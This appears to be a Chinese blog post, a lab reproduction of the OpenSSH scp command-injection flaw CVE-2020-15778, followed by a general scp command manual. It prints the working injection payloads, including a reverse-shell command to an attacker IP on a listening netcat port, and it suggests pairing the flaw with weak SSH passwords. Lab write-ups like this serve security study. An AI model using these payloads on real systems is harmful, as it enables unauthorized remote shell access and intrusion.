IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> [ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778) -> 正文阅读

[系统运维][ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)

🍬 博主介绍

👨?🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
?主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞?评论?收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论??一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一漏洞影响版本

OpenSSH =< 8.3p1

二、漏洞复现要求

OpenSSH =< 8.3p1
需要知道ssh密码(真实环境中可以配合ssh弱口令使用)
搭建环境
靶机:centOS 7 IP:192.168.13.133
攻击机:kali IP:192.168.13.131

三、查看ssh版本及端口开放情况

安装ssh服务或者开放22端口可以参考我之前的文章

ssh -V

(我centos的上OpenSSH的版本是7.4p1,存在该漏洞)

在这里插入图片描述

netstat -pant |grep 22

(查看22端口是否开启)
(一般来说,安装了OpenSSH服务该端口就是开放的)

在这里插入图片描述

四、查看互通性

这个漏洞复现,需要互通

1、查看chentos ip

ifconfig	

在这里插入图片描述

2、查看kali ip

ifconfig

在这里插入图片描述

3、Kali ping一下centos看是否互通

ping 192.168.13.133

在这里插入图片描述

五、kali对centOS进行写文件,复制文件

首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

1、Kali上创建123.txt

在这里插入图片描述

ls查看是否创建成功,创建成功

在这里插入图片描述

2、复制和写操作

利用SCP复制123.txt到/tmp目录下
利用scp创建test.txt空文件在/tmp目录下

scp 123.txt root@192.168.13.133:'`touch /tmp/test.txt` /tmp'

在这里插入图片描述

如果漏洞存在那我们就把123.txt从kali传到了centos
并在centos创建了一个test.txt的文件

操作成功,漏洞存在

在这里插入图片描述

六、反弹shell

1、反弹过程解析

我们这里用反向连接,步骤:
1、Kali监听端口(攻击机):

nc -lvvp 11111

2、Centos进行连接(靶机):

bash -i >& /dev/tcp/192.168.13.131/11111 0>&1

无法直接在centos上执行命令,借助scp载体,让centos执行连接命令

scp test.txt root@192.168.13.133:'`bash -i >& /dev/tcp/192.168.13.131/11111 0>&1`/tmp/test123.txt'

3、攻击机getshell

2、实操

直接进行nc反弹获取shell(同在局域网,互通,正向反向都行)

1、Kali 先监听一个端口

nc -lvvp 11111

在这里插入图片描述

2、进行反弹shell

scp test123.txt root@192.168.13.133:'`bash -i >& /dev/tcp/192.168.13.131/11111 0>&1`/tmp/test123.txt'

在这里插入图片描述

3、输入密码这边立马反弹得到shell

在这里插入图片描述

4、输入ifconfig看一下,确认是centos的shell

在这里插入图片描述

七、介绍一下scp命令:

Linux scp 命令用于 Linux 之间复制文件和目录。
scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。
scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。

语法

scp [-1246BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file][-l limit] [-o ssh_option] [-P port] [-S program][[user@]host1:]file1 [...] [[user@]host2:]file2

简易写法:

scp [可选参数] file_source file_target 

参数说明:

-1: 强制scp命令使用协议ssh1
-2: 强制scp命令使用协议ssh2
-4: 强制scp命令只使用IPv4寻址
-6: 强制scp命令只使用IPv6寻址
-B: 使用批处理模式(传输过程中不询问传输口令或短语)
-C: 允许压缩。(将-C标志传递给ssh,从而打开压缩功能)
-p:保留原文件的修改时间,访问时间和访问权限。
-q: 不显示传输进度条。
-r: 递归复制整个目录。
-v:详细方式显示输出。scp和ssh(1)会显示出整个过程的调试信息。这些信息用于调试连接,验证和配置问题。
-c cipher: 以cipher将数据传输进行加密,这个选项将直接传递给ssh。
-F ssh_config: 指定一个替代的ssh配置文件,此参数直接传递给ssh。
-i identity_file: 从指定文件中读取传输时使用的密钥文件,此参数直接传递给ssh。
-l limit: 限定用户所能使用的带宽,以Kbit/s为单位。
-o ssh_option: 如果习惯于使用ssh_config(5)中的参数传递方式,
-P port:注意是大写的P, port是指定数据传输用到的端口号
-S program: 指定加密传输时所使用的程序。此程序必须能够理解ssh(1)的选项。

实例

1、从本地复制到远程

命令格式:

scp local_file remote_username@remote_ip:remote_folder 或者 
scp local_file remote_username@remote_ip:remote_file 或者 
scp local_file remote_ip:remote_folder 或者 
scp local_file remote_ip:remote_file 

第1,2个指定了用户名,命令执行后需要再输入密码,第1个仅指定了远程的目录,文件名字不变,第2个指定了文件名;
第3,4个没有指定用户名,命令执行后需要输入用户名和密码,第3个仅指定了远程的目录,文件名字不变,第4个指定了文件名;

应用实例:

scp /home/space/music/1.mp3 root@www.runoob.com:/home/root/others/music 
scp /home/space/music/1.mp3 root@www.runoob.com:/home/root/others/music/001.mp3 
scp /home/space/music/1.mp3 www.runoob.com:/home/root/others/music 
scp /home/space/music/1.mp3 www.runoob.com:/home/root/others/music/001.mp3 

复制目录命令格式:

scp -r local_folder remote_username@remote_ip:remote_folder 或者 
scp -r local_folder remote_ip:remote_folder 

第1个指定了用户名,命令执行后需要再输入密码;
第2个没有指定用户名,命令执行后需要输入用户名和密码;

应用实例:

scp -r /home/space/music/ root@www.runoob.com:/home/root/others/ 
scp -r /home/space/music/ www.runoob.com:/home/root/others/ 

上面命令将本地 music 目录复制到远程 others 目录下。

2、从远程复制到本地

从远程复制到本地,只要将从本地复制到远程的命令的后2个参数调换顺序即可,如下实例
应用实例:

scp root@www.runoob.com:/home/root/others/music /home/space/music/1.mp3 
scp -r www.runoob.com:/home/root/others/ /home/space/music/

说明

1.如果远程服务器防火墙有为scp命令设置了指定的端口,我们需要使用 -P 参数来设置命令的端口号,命令格式如下:

#scp 命令使用端口号 4588
scp -P 4588 remote@www.runoob.com:/usr/local/sin.sh /home/administrator

2.使用scp命令要确保使用的用户具有可读取远程服务器相应文件的权限,否则scp命令是无法起作用的。

八、总结

该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。
利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-08-06 11:16:52  更:2022-08-06 11:17:40 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 23:55:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码